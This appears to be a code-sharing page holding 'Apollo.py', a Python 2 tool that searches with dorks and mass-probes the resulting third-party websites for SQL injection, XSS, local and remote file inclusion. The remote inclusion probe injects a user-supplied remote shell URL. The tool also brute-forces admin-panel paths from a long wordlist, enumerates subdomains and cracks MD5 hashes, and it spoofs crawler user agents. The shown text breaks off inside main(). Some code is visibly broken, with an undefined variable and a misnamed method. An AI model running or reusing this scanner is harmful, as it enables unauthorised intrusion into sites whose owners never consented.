Return to Snippet

Revision: 64323
at July 24, 2013 05:51 by madfedora


Initial Code
#!/usr/bin/env python
"""
      Apollo.py - Python Vulnerability Scanner V1 -
       Written by Sotd - twitter.com/#!/Sotd_

	Modified and fixed by madfedora
	[email protected] 
"""     
import re
import hashlib
import Queue
from random import choice
import threading
import time
import urllib2
import sys
import socket

USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3",
             "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7",
             "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
             "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
             "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)",
	     "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6",
	     "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_1 rv:2.0; sl-SI) AppleWebKit/533.24.1 (KHTML, like Gecko) Version/4.0.3 Safari/533.24.1",
"Mozilla/5.0 (Windows; U; Windows NT 6.0) AppleWebKit/531.13.6 (KHTML, like Gecko) Version/5.0.2 Safari/531.13.6",
"Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/4.1)"
            ]
option = ' '
vuln = 0
invuln = 0
np = 0
found = []

class Crawl:
    """Searches for dorks and grabs results"""
    def __init__(self):
        if option == '4':
            self.shell = str(raw_input('Shell Location: '))
        self.dork = raw_input('Enter your dork: ')
        self.queue = Queue.Queue()
        self.pages = raw_input('How many pages (Max 80): ')
        self.qdork = urllib2.quote(self.dork)
        self.page = 1
        self.crawler()
   
    def crawler(self):
        """Crawler"""
        print '\nDorking...'
        for i in range(int(self.pages)):
            host = "http://us.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page)
            req = urllib2.Request(host)
            req.add_header('User-Agent', choice(USER_AGENT))
            response = urllib2.urlopen(req)
            source = response.read()
            start = 0
            count = 1
            end = len(source)
            numlinks = source.count('_t" href', start, end)
 
            while count < numlinks:
                start = source.find('_t" href', start, end)
                end = source.find(' onmousedown="return pk', start,  end)
                link = source[start+10:end-1].replace("amp;","")
                self.queue.put(link)
                start = end
                end = len(source)
                count = count + 1 
            self.page += 1

        if option == '1':
            for i in range(10):
                thread = ScanClass(self.queue)
                thread.setDaemon(True)
                thread.start() 
            self.queue.join()

        elif option == '3':
            for i in range(10):
                thread = LScanClass(self.queue)
                thread.setDaemon(True)
                thread.start() 
            self.queue.join()

        elif option == '2':
            for i in range(10):
                thread = XScanClass(self.queue)
                thread.setDaemon(True)
                thread.start() 
            self.queue.join()

        elif option == '4':
            for i in range(10):
                thread = RScanClass(self.queue, self.shell)
                thread.setDaemon(True)
                thread.start() 
            self.queue.join()

   
class ScanClass(threading.Thread):
    """Scans for Sql errors and ouputs to file"""
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue
        self.schar = "'"
        self.file = 'sqli-result.txt'
 
    def run(self):
        """Scans Url for Sql errors"""
        while True:
            try:
                site = self.queue.get(False)
            except Queue.Empty:
                break
            if '=' in site:
                global vuln
                global invuln
                global np
                test = site + self.schar

                try:
                    conn = urllib2.Request(test)
                    conn.add_header('User-Agent', choice(USER_AGENT))
                    opener = urllib2.build_opener()
                    data = opener.open(conn).read()
                except:
                    self.queue.task_done()
                else:
#===========================================================#
#                                                           #
#      MySQL                                                #
#                                                           #
#===========================================================#
                    if (re.findall("You have an error in your SQL syntax", data, re.I)):
                        self.mysql(test)
                        vuln += 1
                    elif (re.findall('Error:unknown', data, re.I)):
                        self.mysql(test)
                        vuln += 1
                    elif (re.findall('mysql_fetch', data, re.I)):
                        self.mysql(test)
                        vuln += 1
		    elif (re.findall('mysql_numrows', data, re.I)):
                        self.mysql(test)
                        vuln += 1
		    elif (re.findall('mysql_num', data, re.I)):
                        self.mysql(test)
                        vuln += 1
		    elif (re.findall('Invalid Query', data, re.I)):
                        self.mysql(test)
                        vuln += 1
		    elif (re.findall('FetchRow', data, re.I)):
                        self.mysql(test)
                        vuln += 1
		    elif (re.findall('GetArray', data, re.I)):
                        self.mysql(test)
                        vuln += 1
		    elif (re.findall('SELECT statements have a different number of columns', data, re.I)):
                        self.mysql(test)
                        vuln += 1
		    elif (re.findall('\' doesn\'t exist', data, re.I)):
                        self.mysql(test)
                        vuln += 1
		    elif (re.findall('Unexpected EOF found when reading file', data, re.I)):
                        self.mysql(test)
                        vuln += 1
		    elif (re.findall('Triggers can not be created on system tables', data, re.I)):
                        self.mysql(test)
                        vuln += 1
#===========================================================#
#                                                           #
#      MsSQL                                                #
#                                                           #
#===========================================================#
                    elif (re.findall('OLE DB Provider for SQL Server', data, re.I)):
                        self.mssql(test)
                        vuln += 1
		    elif (re.findall('Unclosed quotation mark before the character string', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    elif (re.findall('All queries in a SQL statement containing a UNION', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    elif (re.findall('Syntax error converting the varchar value', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    elif (re.findall('syntax near the keyword \'', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    elif (re.findall('String or binary data would be truncated', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    elif (re.findall('Invalid object name \'', data, re.I)):
                        self.mssql(test)
                        vuln += 1
                    elif (re.findall('Incorrect syntax near', data, re.I)):
                        self.mssql(test)
                        vuln += 1
#===========================================================#
#                                                           #
#      Oracle                                               #
#                                                           #
#===========================================================#
                    elif (re.findall('oracle.jdbc.', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('java.sql.sqlexception', data, re.I)):
                        self.oracle(test)
                        vuln += 1
                    elif (re.findall('SQL command not properly ended', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('quoted string not properly terminated', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('wrong number or types of arguments in call to', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('query block has incorrect number of result columns', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('expression must have same datatype as correspoding expression', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('ORA-01722:', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('a non-numeric character was found where a numeric was expected', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('FROM keyword not found where expected', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('ORA-00936:', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('ORA-00972:', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('table or view does not exist', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('Invalid relational operator', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('missing right parenthesis', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('ORA-00900:', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('ORA-03001:', data, re.I)):
                        self.oracle(test)
                        vuln += 1
		    elif (re.findall('can only select from fixed tables/views', data, re.I)):
                        self.oracle(test)
                        vuln += 1
#===========================================================#
#                                                           #
#      OLE DB                                               #
#                                                           #
#===========================================================#
                    elif (re.findall('system.data.oledb', data, re.I)):
                        self.ole(test)
                        vuln += 1
                    elif (re.findall('Microsoft OLE DB Provider for', data, re.I)):
                        self.ole(test)
                        vuln += 1
#===========================================================#
#                                                           #
#      ODBC                                                 #
#                                                           #
#===========================================================#
                    elif (re.findall('ODBC Microsoft Access Driver', data, re.I)):
                        self.odbc(test)
                        vuln += 1
                    elif (re.findall('ODBC Microsoft Server Driver', data, re.I)):
                        self.odbc(test)
                        vuln += 1
#===========================================================#
#                                                           #
#      JET DB                                               #
#                                                           #
#===========================================================#
                    elif (re.findall('JET Database Engine', data, re.I)):
                        self.jet(test)
                        vuln += 1
#===========================================================#
#                                                           #
#      ADO DB                                               #
#                                                           #
#===========================================================#
                    elif (re.findall('ADODB.Field', data, re.I)):
                        self.ado(test)
                        vuln += 1
                    elif (re.findall('ADODB.Command', data, re.I)):
                        self.ado(test)
                        vuln += 1
                    elif (re.findall('BOF or EOF', data, re.I)):
                        self.ado(test)
                        vuln += 1
#===========================================================#
#                                                           #
#      PostgreSQL                                           #
#                                                           #
#===========================================================#
                    elif (re.findall('postgresql.util', data, re.I)):
                        self.pgsql(test)
                        vuln += 1
                    elif (re.findall('ERROR: invalid input syntax for integer', data, re.I)):
                        self.pgsql(test)
                        vuln += 1
                    elif (re.findall('null_value_eliminated_in_set_function', data, re.I)):
                        self.pgsql(test)
                        vuln += 1
                    elif (re.findall('dynamic_result_sets_returned', data, re.I)):
                        self.pgsql(test)
                        vuln += 1
                    elif (re.findall(': FATAL', data, re.I)):
                        self.pgsql(test)
                        vuln += 1
                    elif (re.findall(': could not connect to server', data, re.I)):
                        self.pgsql(test)
                        vuln += 1
#===========================================================#
#                                                           #
#      Sybase                                               #
#                                                           #
#===========================================================#
                    elif (re.findall('Warning: sybase_query()', data, re.I)):
                        self.sybase(test)
                        vuln += 1
                    elif (re.findall('sybase_fetch_assoc()', data, re.I)):
                        self.sybase(test)
                        vuln += 1
#===========================================================#
#                                                           #
#      Misc                                                 #
#                                                           #
#===========================================================#
                    elif (re.findall('query failed:', data, re.I)):
                        self.misc(test)
                        vuln += 1
                    else:
                        print B+test+W+' <-- Not Vuln'
                        invuln += 1
            else:
                print R+site+W+' <-- No Parameters'
                np += 1
            self.queue.task_done()


    def mysql(self, url):
        """Outputs"""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] '+W+url
        else:
            print O+"[MySQL] " + url+W
            write = open(self.file, "a+")
            write.write('[MySQL] ' + url + "\n")
            write.close()

    def mssql(self, url):
        """Outputs"""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[MsSQL] " + url+W
	    write = open (self.file, "a+")
            write.write('[MsSQL] ' + url + "\n")
            write.close()   

    def oracle(self, url):
        """Outputs"""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[Oracle] " + url+W
	    write = open (self.file, "a+")
            write.write('[Oracle] ' + url + "\n")
            write.close()

    def ole(self, url):
        """Outputs"""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[OLE DB] " + url+W
	    write = open (self.file, "a+")
            write.write('[OLE DB] ' + url + "\n")
            write.close()

    def odbc(self, url):
        """Outputs"""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[ODBC] " + url+W
	    write = open (self.file, "a+")
            write.write('[ODBC] ' + url + "\n")
            write.close()

    def jet(self, url):
        """Outputs"""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[JET DB] " + url+W
	    write = open (self.file, "a+")
            write.write('[JET DB] ' + url + "\n")
            write.close()

    def ado(self, url):
        """Outputs"""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[ADO] " + url+W
	    write = open (self.file, "a+")
            write.write('[ADO] ' + url + "\n")
            write.close()

    def psql(self, url):
        """Outputs"""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[PGSQL] " + url+W
	    write = open (self.file, "a+")
            write.write('[PGSQL] ' + url + "\n")
            write.close()

    def sybase(self, url):
        """Outputs"""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[SYBASE] " + url+W
	    write = open (self.file, "a+")
            write.write('[SYBASE] ' + url + "\n")
            write.close()

    def misc(self, url):
        """Outputs"""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[Misc] " + url+W
	    write = open (self.file, "a+")
            write.write('[Misc] ' + url + "\n")
            write.close()

class LScanClass(threading.Thread):
    """Scans for Lfi errors and outputs to file"""
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.file = 'lfi-result.txt'
        self.queue = queue
        self.lchar = '../' 
       
    def run(self):
        """Checks Url for File Inclusion errors"""
        while True:
            try:
                site = self.queue.get(False)
            except Queue.Empty:
                break
            if '=' in site:
                lsite = site.rsplit('=', 1)[0]
                if lsite[-1] != "=":
                    lsite = lsite + "="
                test = lsite + self.lchar
                global vuln
                global invuln
                global np

                try:
                    conn = urllib2.Request(test)
                    conn.add_header('User-Agent', choice(USER_AGENT))
                    opener = urllib2.build_opener()
                    data = opener.open(conn).read()

                except:
                    self.queue.task_done()

                else:
                    if (re.findall("failed to open stream: No such file or directory", data, re.I)):
                        self.lfi(test)
                        vuln += 1
                    else:
                        print B+test+W+' <-- Not Vuln'
                        invuln += 1
            else:
                print R+site+W+' <-- No Parameters' 
                np += 1  
            self.queue.task_done()


    def lfi(self, url):
        """Outputs"""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[LFI] " + url+W
            write = open(self.file, "a+")
            write.write('[LFI] ' + url + "\n")
            write.close()      


class XScanClass(threading.Thread):
    """Scan for Xss errors and outputs to file"""
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue
        self.xchar = """%3CScRIpT%3Ealert(%224p0ll0%22)%3C%2FScRiPt%3E"""
        self.file = 'xss-result.txt'
 
    def run(self):
        """Checks Url for possible Xss"""
        while True:
            try:
                site = self.queue.get(False)
            except Queue.Empty:
                break
            if '=' in site:
                global vuln
                global invuln
                global np
                xsite = site.rsplit('=', 1)[0]
                if xsite[-1] != "=":
                    xsite = xsite + "="
                test = xsite + self.xchar
                try:
                    conn = urllib2.Request(test)
                    conn.add_header('User-Agent', choice(USER_AGENT))
                    opener = urllib2.build_opener()
                    data = opener.open(conn).read()
                except:
                    self.queue.task_done()
                else:
                    if (re.findall("4p0ll0", data, re.I)):
                        self.xss(test)
                        vuln += 1
                    else:
                        print B+test+W+' <-- Not Vuln'
                        invuln += 1
            else:
                print R+site+W+' <-- No Parameters'
                np += 1
            self.queue.task_done()
 
    def xss(self, url):
        """Outputs"""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[XSS] " + url+W
            write = open(self.file, "a+")
            write.write('[XSS] ' + url + "\n")
            write.close()   


class RScanClass(threading.Thread):
    """Scans for Rfi errors and outputs to file"""
    def __init__(self, queue, shell):
        threading.Thread.__init__(self)
        self.queue = queue
        self.file = 'rfi-result.txt'
        self.shell = shell
 
    def run(self):
        """Checks Url for Remote File Inclusion vulnerability"""
        while True:
            try:
                site = self.queue.get(False)
            except Queue.Empty:
                break
            if '=' in site:
                global vuln
                global invuln
                global np
                rsite = site.rsplit('=', 1)[0]
                if rsite[-1] != "=":
                    rsite = rsite + "="
                link = rsite + self.shell + '?'
                try:
                    conn = urllib2.Request(link)
                    conn.add_header('User-Agent', choice(USER_AGENT))
                    opener = urllib2.build_opener()
                    data = opener.open(conn).read()
                except:
                    self.queue.task_done()
                else:
                    if (re.findall('uname -a', data, re.I)):
                        self.rfi(link)
                        vuln += 1
                    else:
                        print B+link+W+' <-- Not Vuln'
                        invuln += 1
            else:
                print R+site+W+' <-- No Parameters'
                np += 1        
            self.queue.task_done()
   
    def rfi(self, url):
        """Outputs"""
        read = open(self.file, "a+").read()
        if url in read:
            print G+'[DUPE] ' + url+W
        else:
            print O+"[RFI] " + url+W
            write = open(self.file, "a+")
            write.write('[RFI] ' + url + "\n")
            write.close()       

 
class Atest(threading.Thread):
    """Checks given site for Admin Pages"""
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue
 
    def run(self):
        """Checks if Admin Page exists"""
        while True:
            try:
                site = self.queue.get(False)

            except Queue.Empty:
                break
            try:
                conn = urllib2.Request(site)
                conn.add_header('User-Agent', choice(USER_AGENT))
                opener = urllib2.build_opener()
                opener.open(conn)
                print site
                found.append(site)
                self.queue.task_done()
   
            except urllib2.URLError:
                self.queue.task_done()


def admin():
    """Create queue and threads for admin page scans"""
    print 'Need to include http:// and ending /\n'
    site = raw_input('Site: ')
    queue  = Queue.Queue()
    dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/', 
            'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php', 
            'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' ,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html', 
            'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php', 
            'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp', 
            'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html', 
            'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php',
            'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html',
            'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html',
            'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html',
            'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html',
            'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html',
            'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html',
            'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html',
            'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html',
            'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php',
            'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php',
            'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php',
            'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php','admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/']
    
    for add in dirs:
        test = site + add
        queue.put(test)
        
    for i in range(20):
        thread = Atest(queue)
        thread.setDaemon(True)
        thread.start() 
    queue.join()

def aprint():
    """Print results of admin page scans"""
    print 'Search Finished\n'
    if len(found) == 0:
        print '-[!]-  No pages found'
    else:
        for site in found:
            print O+'-[!]-  Found: ' + G+site+W

       
class SDtest(threading.Thread):
    """Checks given Domain for Sub Domains"""
    def __init__(self, queue):
        threading.Thread.__init__(self)
        self.queue = queue
 
    def run(self):
        """Checks if Sub Domain responds"""
        while True:
            try:
                domain = self.queue.get(False)
            except Queue.Empty:
                break
            try:
                site = domain
                conn = urllib2.Request(site)
                conn.add_header('User-Agent', choice(USER_AGENT))
                opener = urllib2.build_opener()
                opener.open(conn)
            except urllib2.URLError:
                self.queue.task_done()
            else:
                target = socket.gethostbyname(domain)  
                print 'Found: ' + site + ' - ' + target
                self.queue.task_done()        
 

def subd():
    """Create queue and threads for sub domain scans"""
    queue = Queue.Queue()
    site = raw_input('Domain: ')
    sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca",
            "billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes", "clients", "carro",
            "connect", "controller", "correoweb", "cpanel", "csg", "customers", "db", "dbs", "demo", "demon", "demostration", "descargas", "developers", "development", "diana",
            "directory", "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos", "email", "enrutador", "example", "examples", "exchange",
            "eventos", "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford",
            "groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d",
            "imapd", "imaps", "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab", "laboratories", "labs", "library", "linux", "lisa",  "login", "logs", "mail", "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil",
            "mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners", "pcanywhere",
            "pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research",
            "restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure", "seguro", "server", "services", "servicios", "servidor", "shop", "shopping",
            "smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp", "tienda", "unix", "upload", "uploads",
            "ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1",
            "ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"]

    for check in sub:
        test = check + '.' + site
        queue.put(test)
        
    for i in range(20):
        thread = SDtest(queue)
        thread.setDaemon(True)
        thread.start() 
    queue.join()


class Cracker(threading.Thread):
    """Use a wordlist to try and brute the hash"""
    def __init__(self, queue, hashm):
        threading.Thread.__init__(self)
        self.queue = queue
        self.hashm = hashm

    def run(self): 
        """Hash word and check against hash"""
        while True:
            try:
                word = self.queue.get(False)
            except Queue.Empty:
                break
            tmp = hashlib.md5(word).hexdigest()
            if tmp == self.hashm:
                self.result(word)   
            self.queue.task_done() 

    def result(self, words):
        """Print result if found"""
        print self.hashm + ' = '+Words

def word():
    """Create queue and threads for hash crack"""
    queue = Queue.Queue()
    wordlist = raw_input('Wordlist: ')
    hashm = raw_input('Enter MD5 hash: ')
    read = open(wordlist)
    for words in read:
        words = words.replace("\n","")
        queue.put(words)       
    read.close()
    for i in range(5):
        thread = Cracker(queue, hashm)
        thread.setDaemon(True)
        thread.start()
    queue.join()


class OnlineCrack:
    """Use online service to check for hash"""

    def crack(self):
        """Connect and check hash"""
        hashm = raw_input('Enter MD5 Hash: ')
        conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm))
        conn.add_header('User-Agent', choice(USER_AGENT))
        opener = urllib2.build_opener()
        opener.open(conn)
        data = opener.open(conn).read()
        if data == 'No results returned.':
            print '\n-[!]- Not found!'
        if data == 'Cleartext of':
            print '\n-[!]- %s' % (data)


class Check:
    """IP address Checker"""

    def grab(self):
        """Connect to site and grab IP"""
        site = 'http://www.tracemyip.org/'
        try:
            conn = urllib2.Request(site)
            conn.add_header('User-Agent', choice(USER_AGENT))
            opener = urllib2.build_opener()
            opener.open(conn)
            data = opener.open(conn).read()  
            start = 0
            end = len(data)     
            start = data.find('onClick="', start, end)
            end = data.find('size=', start, end)   
            ip_add = data[start+46:end-2].strip()
            print B+'\n-[!]-  Your IP Address Is '+R+'%s' % (ip_add) +W
	    
        
        except urllib2.HTTPError:
            print '-[!]-  Error connecting'
    

def output():
    """Outputs dork scan results to screen"""
    print '\n>> ' + str(vuln) + G+' Vulnerable Sites Found'+W
    print '>> ' + str(invuln) + G+' Sites Not Vulnerable'+W
    print '>> ' + str(np) + R+' Sites Without Parameters'+W
    if option == '1':
        print '>> Output Saved To sqli-result.txt\n'
    elif option == '2':
        print '>> Output Saved To lfi-result.txt'
    elif option == '3':
        print '>> Output Saved To xss-result.txt'
    elif option == '4':
        print '>> Output Saved To rfi-result.txt'  


W  = "\033[0m";  
R  = "\033[31m"; 
G  = "\033[32m"; 
O  = "\033[33m"; 
B  = "\033[34m";

def main():
    """Outputs Menu and gets input"""
    print (O+'''
    Apollo [Enhanced]
    by madhatter

    Original by Sotd
    github.com/SotdCode/Apollo''')
    print (G+'''
-[1]-  SQL Injection
-[2]-  Cross Site Scripting
-[3]-  Local File Incursion
-[4]-  Remote File Incursion
-[5]-  Admin Page Finder
-[6]-  Sub Domain Finder
-[7]-  Dictionary MD5 cracker
-[8]-  Online MD5 cracker
-[9]-  IP Address Checker
-[10]- See What Changed''')
    print W
    global option
